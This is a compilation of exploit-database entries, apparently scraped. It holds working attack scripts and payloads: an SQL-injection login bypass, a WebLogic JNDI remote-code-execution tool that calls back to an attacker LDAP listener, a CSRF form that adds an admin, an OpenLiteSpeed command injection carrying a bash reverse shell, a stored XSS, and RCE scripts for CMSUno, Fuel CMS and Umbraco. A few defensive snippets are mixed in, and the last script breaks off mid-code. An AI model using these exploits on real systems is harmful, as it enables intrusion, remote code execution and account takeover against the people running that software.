
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
# STEP 1: Run the exploit with this command: python3 exploit.py
# STEP 2: Input the URL of the vulnerable application, for example: http://10.9.67.23/libsystem/
# STEP 3: Open the link printed at the end, after a successful authentication bypass, in a browser.

# Note: you will only be able to access the Student Area as a privileged user.

import requests
YELLOW =  '\033[33m' # Yellow Text
GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults

print(YELLOW+'      _          ______  _               _  ___           ', RESET)
print(YELLOW+'  ___| |_ ___   / / ___|| |__   __ _  __| |/ _ \__      __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'|  __/ || (__ / /  ___) | | | | (_| | (_| | |_| |\ V  V / ', RESET)
print(YELLOW+' \___|\__\___/_/  |____/|_| |_|\__,_|\__,_|\___/  \_/\_/  ', RESET)
print(YELLOW+" ", RESET)                                                          
print('********************************************************')
print('**                  LIBRARY SYSTEM 1.0                **')
print('**     AUTHENTICATION BYPASS USING SQL INJECTION      **')
print('********************************************************')

print('Author - Himanshu Shukla')


# Create a new session
s = requests.Session()

# Set cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}

LINK = input("Enter URL of the vulnerable application : ")
if not LINK.endswith('/'):
    LINK += '/'  # login.php is appended directly, so the base URL needs a trailing slash

# Authentication bypass (a single POST is enough; the original sent the same request twice)
print("[*]Attempting Authentication Bypass...")
values = {"student": "'or 1 or'", "login": ""}
r = s.post(LINK + 'login.php', data=values, cookies=cookies)

# Check whether authentication was bypassed: the application answers
# "Student not found" when the lookup returns no row.
logged_in = "Student not found" not in r.text
if logged_in:
    print(GREEN + "[+]Authentication Bypass Successful!", RESET)
    print(YELLOW + "[+]Open This Link To Continue As Privileged User : " + LINK + "index.php", RESET)
else:
    print(RED + "[-]Failed To Authenticate!", RESET)
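The bypass works because the student number is concatenated into the lookup query, so the value 'or 1 or' turns the WHERE clause into a condition that is true for every row. The following is an added illustration, not part of the original exploit, written against an SQLite stand-in for the application's MySQL table (table and column names are assumptions); it runs the same payload through a concatenated query and through a parameterized one and applies the "Student not found" check the exploit relies on:

```python
import sqlite3

# Constructed stand-in for the application's student table (names assumed).
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, student TEXT, name TEXT)")
DB.executemany("INSERT INTO students (student, name) VALUES (?, ?)",
               [("2021001", "Alice"), ("2021002", "Bob")])

PAYLOAD = "'or 1 or'"  # the value the exploit sends in the "student" field


def lookup_vulnerable(student_no: str):
    """Lookup that builds the WHERE clause by string concatenation.

    With the payload the statement becomes
        SELECT ... WHERE student='' or 1 or ''
    and the constant 1 makes the condition true for every row, so the first
    student record is returned although no real student number was supplied.
    """
    sql = "SELECT id, student, name FROM students WHERE student='" + student_no + "'"
    return DB.execute(sql).fetchone()


def lookup_parameterized(student_no: str):
    """Same lookup with a bound parameter: the payload is compared as a literal
    string, matches no row, and the application reports 'Student not found'."""
    sql = "SELECT id, student, name FROM students WHERE student=?"
    return DB.execute(sql, (student_no,)).fetchone()


def login_message(row):
    """The response text the exploit script tests for: 'Student not found'
    when the query returned nothing, a welcome line otherwise."""
    return "Student not found" if row is None else "Welcome " + row[2]


if __name__ == "__main__":
    print("concatenated :", login_message(lookup_vulnerable(PAYLOAD)))      # Welcome Alice
    print("parameterized:", login_message(lookup_parameterized(PAYLOAD)))   # Student not found
    print("real student :", login_message(lookup_parameterized("2021002")))  # Welcome Bob
```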
            
# Exploit Title: Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)
# Date: 2021-01-21
# Exploit Author: Photubias 
# Vendor Advisory: [1] https://www.oracle.com/security-alerts/cpujan2021.html
# Vendor Homepage: https://www.oracle.com
# Version: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0 (fixed in JDKs 6u201, 7u191, 8u182 & 11.0.1)
# Tested on: WebLogic 14.1.1.0 with JDK-8u181 on Windows 10 20H2
# CVE: CVE-2021-2109

#!/usr/bin/env python3
'''    
	Copyright 2021 Photubias(c)

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.
        
        File name CVE-2021-2109.py
        written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

        This is a native implementation without requirements, written in Python 3.
        Works equally well on Windows as Linux (as MacOS, probably ;-)
        
        Requires JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
         from https://github.com/welk1n/JNDI-Injection-Exploit
         to be in the same folder
'''
import urllib.request, urllib.parse, http.cookiejar, ssl
import sys, os, optparse, subprocess, threading, time

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7001'
iTimeout = 5
oRun = None

## Ignore unsigned certs, if any because WebLogic is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

class runJar(threading.Thread):
    def __init__(self, sJarFile, sCMD, sAddress):
        self.stdout = []
        self.stderr = ''
        self.cmd = sCMD
        self.addr = sAddress
        self.jarfile = sJarFile
        self.proc = None
        threading.Thread.__init__(self)

    def run(self):
        self.proc = subprocess.Popen(['java', '-jar', self.jarfile, '-C', self.cmd, '-A', self.addr], shell=False, stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines=True)
        for line in iter(self.proc.stdout.readline, ''): self.stdout.append(line)
        for line in iter(self.proc.stderr.readline, ''): self.stderr += line
        

def findJNDI():
    sCurDir = os.getcwd()
    sFile = ''
    for file in os.listdir(sCurDir):
        if 'JNDI' in file and '.jar' in file:
            sFile = file
    ## Stop early instead of reporting an empty filename as "found"
    if sFile == '': exit('[-] Error: no JNDI*.jar file found in ' + sCurDir)
    print('[+] Found and using ' + sFile)
    return sFile

def findJAVA(bVerbose):
    try:
        ## Pass an argument list, not a single string: without a shell, 'java -version' as one
        ## string is looked up as an executable of that name and fails on Linux
        oProc = subprocess.Popen(['java', '-version'], stdout = subprocess.PIPE, stderr = subprocess.STDOUT)
    except OSError:
        exit('[-] Error: java not found, needed to run the JAR file\n    Please make sure to have "java" in your path.')
    sResult = list(oProc.stdout)[0].decode()
    if bVerbose: print('[+] Found Java: ' + sResult.strip())

def checkParams(options, args):
    if args: sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
    ## Normalise the URL whether it came from the command line or the prompt
    if sHost[-1:] == '/': sHost = sHost[:-1]
    if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.username: sUser = options.username
    else:
        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '':
        exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        ' in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
        )

    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)
    
    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    
    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Successfully logged in!\n')
    else: exit('[-] Authentication Denied')
    
    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability: the console fetches an LDAP reference from our listener, which is then run on the victim. The address check is bypassed because the IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ##  http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()
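The comment in main() explains that the exploit writes the listener address as 192.168.0;10 so that it does not look like a dotted IPv4 address to the console's check. As an added detection example (not part of the exploit above and not WebLogic code), the following takes access-log style request lines, pulls the JNDIBindingPortlethandle value out of the query string, extracts the host of the embedded ldap:// URL, and flags any host that is neither a strict IPv4 literal nor a syntactically valid hostname. The log lines are constructed; the random path segment 5r5mu7 is the one shown in the exploit's sample URL.

```python
import re
import ipaddress
from urllib.parse import unquote

# Constructed access-log style lines: a benign console page, a request carrying the
# handle shape from the exploit (listener IP written with ';'), and one whose
# ldap host is a plain dotted IPv4 address.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jan/2021:10:01:02 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 5120
10.0.0.7 - - [21/Jan/2021:10:01:09 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.0;10:1389/5r5mu7;AdminServer%22) HTTP/1.1" 200 2048
10.0.0.7 - - [21/Jan/2021:10:02:31 +0000] "GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.0.10:1389/abc;AdminServer%22) HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')
HANDLE_RE = re.compile(r'JndiBindingHandle\("(?P<url>[^"]+)"')
HOSTNAME_RE = re.compile(r"[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*")


def query_param(query: str, name: str):
    """Split on '&' only: the handle value itself contains ';', which some
    query-string parsers also treat as a separator and would cut the value short."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def ldap_host_from_handle(handle: str):
    """Host part of the ldap:// URL inside a JndiBindingHandle(...) value, or None.
    Scheme, path and port are stripped by hand so that a ';' in the host survives."""
    m = HANDLE_RE.search(handle)
    if not m or not m.group("url").lower().startswith("ldap://"):
        return None
    hostport = m.group("url")[len("ldap://"):].split("/", 1)[0]
    return hostport.rsplit(":", 1)[0] if ":" in hostport else hostport


def is_well_formed_host(host: str) -> bool:
    """True for a valid IPv4 literal or a syntactically valid hostname.
    '192.168.0;10' is neither, which is exactly the shape the exploit relies on."""
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(host) is not None


def scan_log(text: str):
    """(line number, host) for each request whose handle points at a malformed ldap host."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group("path").partition("?")[2]
        handle = query_param(query, "JNDIBindingPortlethandle")
        if handle is None:
            continue
        host = ldap_host_from_handle(handle)
        if host is not None and not is_well_formed_host(host):
            hits.append((n, host))
    return hits


if __name__ == "__main__":
    for n, host in scan_log(SAMPLE_LOG):
        print(f"line {n}: malformed ldap host {host!r} in JNDIBindingPortlethandle")
```

Whether a well-formed external host should be allowed to appear in a console JNDI handle at all is a separate policy decision; this check only isolates the malformed form that the bypass depends on.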
            
# Exploit Title: STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)
# Date: 19.01.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.stvs.ch

STVS ProVision 5.9.10 Cross-Site Request Forgery (Add Admin)


Vendor: STVS SA
Product web page: http://www.stvs.ch
Platform: Ruby
Affected version:  5.9.10 (build 2885-3a8219a)
                   5.9.9 (build 2882-7c3b787)
                   5.9.7 (build 2871-a450938)
                   5.9.1 (build 2771-1bbed11)
                   5.9.0 (build 2701-6123026)
                   5.8.6 (build 2557-84726f7)
                   5.7
                   5.6
                   5.5

Summary: STVS is a Swiss company specializing in development of
software for digital video recording for surveillance cameras
as well as the establishment of powerful and user-friendly IP
video surveillance networks.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: Ubuntu 14.04.3
           nginx/1.12.1
           nginx/1.4.6
           nginx/1.1.19
           nginx/0.7.65
           nginx/0.3.61


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5625
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5625.php

19.01.2021

--


<html>
  <body>
    <form action="http://192.168.1.17/users/create" method="POST">
      <input type="hidden" name="login" value="testingus" />
      <input type="hidden" name="password" value="testingus" />
      <input type="hidden" name="confirm&#95;password" value="testingus" />
      <input type="hidden" name="email" value="test&#64;test&#46;tld" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="hidden" name="never&#95;expire" value="on" />
      <input type="hidden" name="disabled&#95;acc" value="false" />
      <input type="submit" value="Forge request" />
    </form>
  </body>
</html>
            
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)
# Date: 26/1/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://openlitespeed.org/
# Software Link: https://openlitespeed.org/kb/install-from-binary/
# Version: 1.7.8
# Tested on Windows 10


Step 1: Log in to the dashboard using the Administrator account.
Step 2: Access Server Configuration > External App > Command.
Step 3: Set the "Start By Server *" value to "Yes (Through CGI Daemon)".
Step 4: Inject the payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" into the "Command" value.
Step 5: Graceful Restart.

[POC]

POST /view/confMgr.php HTTP/1.1
Host: target:7080
Connection: close
Content-Length: 579
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://target:7080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target:7080/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee; litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D; LSPA37FE0C43B84483E0=excYiZbpUS4%3D

name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077
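The command path in step 4 escapes the server's own directory purely through ".." segments. As an added defensive example (not OpenLiteSpeed's code; the install root and the rule that external-app executables must live under it are assumptions made here), the following resolves the executable named in a command string and refuses anything that leaves the configured root, using a harmless command argument instead of the reverse shell above:

```python
import posixpath
import shlex

SERVER_ROOT = "/usr/local/lsws"  # assumed install root; external-app executables must stay under it


def executable_of(command: str) -> str:
    """The program the server would launch: the first shell token of the command line."""
    tokens = shlex.split(command)
    if not tokens:
        raise ValueError("empty command")
    return tokens[0]


def resolve_under_root(exe: str, root: str = SERVER_ROOT) -> str:
    """Join the executable to the root and collapse '.' and '..' lexically.
    posixpath.join discards root when exe is absolute, so '/bin/sh' resolves to itself,
    and normpath folds the '..' segments without consulting the filesystem."""
    return posixpath.normpath(posixpath.join(root, exe))


def is_within_root(path: str, root: str = SERVER_ROOT) -> bool:
    root = posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def validate_command(command: str, root: str = SERVER_ROOT):
    """Return (accepted, resolved_executable). The traversal from step 4,
    'fcgi-bin/lsphp5/../../../../../bin/bash', resolves to /bin/bash and is refused."""
    resolved = resolve_under_root(executable_of(command), root)
    return is_within_root(resolved, root), resolved


if __name__ == "__main__":
    for cmd in ("fcgi-bin/lsphp5",
                "fcgi-bin/lsphp5/../../../../../bin/bash -c 'id'",
                "/bin/sh"):
        ok, path = validate_command(cmd)
        print("accept" if ok else "REJECT", cmd, "->", path)
```

Lexical normalisation does not follow symlinks; on a live host, pass the result through os.path.realpath before the containment check.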
            
HireHackking
# Exploit Title: EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting
# Exploit Author: Mahendra Purbia
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/crud-operation-with-php-mysql-bootstrap-and-dompdf/
# Version: 1.0
# Tested on: Windows 10

Vulnerable Parameters: Full Name

Steps to reproduce:
1. Go to http://localhost/PHPCRUD/
2. Click on "add new record" and fill in the details (in the first name field use: "><svg onload=alert(1)// )
3. Reload the page and you will see that the XSS payload executed. It is a stored XSS.

CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)

# Exploit Title: CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated)
# Google Dorks:
#   inurl:uno/central.php
#   inurl:uno/config.php
#   inurl:uno.php intitle:"CMSUno - Login"
# Exploit Author: noraj (Alexandre ZANNI) for SEC-IT (https://secit.fr) https://www.exploit-db.com/?author=10066
# Vendor Homepage: https://www.boiteasite.fr/cmsuno.html
# Software Link: https://github.com/boiteasite/cmsuno/archive/1.6.2.tar.gz
# Version: 1.6.1, 1.6.2
# Tested on: docker image: php:7.4-apache (Debian buster)
# CVE : CVE-2020-25557 & CVE-2020-25538

# Vulnerabilities
## Discoverer: Fatih Çelik
## Discoverer website: https://fatihhcelik.blogspot.com
## Vulnerability 1:
## Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25557
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html
## Vulnerability 2:
## Title: CMSUno 1.6.2 - 'lang' Remote Code Execution (Authenticated)
## CVE: CVE-2020-25538
## References: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution_30.html

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# username = 'cmsuno'
# password = '654321'
# root_url = 'http://localhost:5000/'
# command = 'pwd'

doc = <<~DOCOPT
  CMSUno 1.6.1 <= 1.6.2 - Remote Code Execution (Authenticated)

  Usage:
    #{__FILE__} -r <url> -c <cmd> [-u <username>] [-p <password>] [-t <tech>] [--debug]
    #{__FILE__} -h | --help

  Options:
    -r <url>, --root-url <url>          Root URL (base path) including HTTP scheme, port and root folder
    -u <username>, --user <username>    user name (if not default: cmsuno)
    -p <password>, --pass <password>    User password (if not default: 654321)
    -c <cmd>, --command <cmd>           Command to execute on the target
    -t <tech>, --technique <tech>       Technique: exploiting 'user' param (default, with output) or 'lang' param (blind)
    --debug                             Display arguments
    -h, --help                          Show this screen

  Examples:
    #{__FILE__} -r http://example.org -c id
    #{__FILE__} -r https://example.org:5000/cmsuno -c 'touch hackproof' -u john -p admin1234 -t lang
DOCOPT

# Get anti-CSRF token
def get_unox(client, auth_status)
  print '[*] Fetching anti-CSRF token: '
  res = client.get(LOGIN_URL)
  case auth_status
  when false
    regexp = /name="unox" value="([a-f0-9]{32}?)"/
  when true
    regexp = /Unox='([a-f0-9]{32}?)'/
  end
  token = regexp.match(res.body).captures[0].chomp
  puts token
  return token
end

def login(client, user, pass)
  data = {
    'unox' => get_unox(client, false),
    'user' => user,
    'pass' => pass,
  }
  puts '[*] Logging in'
  res = client.post(LOGIN_URL, data)
  return res.body
end

def exploit(client, user, pass, cmd, tech)
  payload = "#{user}\";$pass='#{pass}';system('#{cmd}');?>// "
  case tech
  when 'user'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=#{user}&pass0=#{pass}&user=#{payload}&pass=#{pass}&lang=en"
  when 'lang'
    data = "action=sauvePass&unox=#{get_unox(client, true)}&user0=&pass0=&user=&pass=&lang=#{payload}"
  else
    raise 'Wrong exploitation technique argument value'
  end
  headers = { 'X-Requested-With' => 'XMLHttpRequest' }
  #client.proxy = 'http://localhost:8080'
  puts "[*] Starting exploitation, using '#{tech}' param technique"
  client.post(VULNERABLE_URL, data, headers)
  # Login again to trigger uno/password.php
  clnt2 = HTTPClient.new
  return login(clnt2, user, pass).lines[..-2].join
end

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  username = args['--user'] || 'cmsuno'
  password = args['--pass'] || '654321'
  technique = args['--technique'] || 'user'
  LOGIN_URL = "#{args['--root-url']}/uno.php"
  VULNERABLE_URL = "#{args['--root-url']}/uno/central.php"
  clnt = HTTPClient.new
  login(clnt, username, password)
  output = exploit(clnt, username, password, args['--command'], technique)
  print '[*] Command output:'
  case technique
  when 'user'
    puts "\n#{output}"
  when 'lang'
    puts ' blind RCE, no output with this exploitation technique'
  end
rescue Docopt::Exit => e
  puts e.message
end

Fuel CMS 1.4.1 - Remote Code Execution (2)

# Title: Fuel CMS 1.4.1 - Remote Code Execution (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-11-14
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu 16.04
# CVE : CVE-2018-16763
# References: https://www.exploit-db.com/exploits/47138

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

# dirty workaround to ignore Max-Age
# https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
$VERBOSE = nil

doc = <<~DOCOPT
  Fuel CMS 1.4 - Remote Code Execution

  Usage:
    #{__FILE__} <url> <cmd>
    #{__FILE__} -h | --help

  Options:
    <url>         Root URL (base path) including HTTP scheme, port and root folder
    <cmd>         The system command to execute
    -h, --help    Show this screen

  Examples:
    #{__FILE__} http://example.org id
    #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
DOCOPT

def exploit(client, root_url, cmd)
  url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
  res = client.get(url)
  /system(.+?)<div/mx.match(res.body).captures[0].chomp
end

begin
  args = Docopt.docopt(doc)
  clnt = HTTPClient.new
  puts exploit(clnt, args['<url>'], args['<cmd>'])
rescue Docopt::Exit => e
  puts e.message
end

Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)

# Exploit Title: Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)
# Date: 2020-03-28
# Exploit Author: Alexandre ZANNI (noraj)
# Based on: https://www.exploit-db.com/exploits/46153
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# Example: python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig

import requests
import re
import argparse
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(prog='exploit.py',
    description='Umbraco authenticated RCE',
    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=80))
parser.add_argument('-u', '--user', metavar='USER', type=str, required=True, dest='user', help='username / email')
parser.add_argument('-p', '--password', metavar='PASS', type=str, required=True, dest='password', help='password')
parser.add_argument('-i', '--host', metavar='URL', type=str, required=True, dest='url', help='root URL')
parser.add_argument('-c', '--command', metavar='CMD', type=str, required=True, dest='command', help='command')
parser.add_argument('-a', '--arguments', metavar='ARGS', type=str, required=False, dest='arguments', help='arguments', default='')
args = parser.parse_args()

# Payload
payload = """\
<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"><msxsl:script language="C#" implements-prefix="csharp_user">public string xml() { string cmd = "%s"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "%s"; proc.StartInfo.Arguments = cmd; proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> </xsl:template> </xsl:stylesheet>\
""" % (args.arguments, args.command)

login = args.user
password = args.password
host = args.url

# Process Login
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = { "username": login, "password": password}
s = requests.session()
r2 = s.post(url_login,json=loginfo)

# Go to vulnerable web page
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}
data = {
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
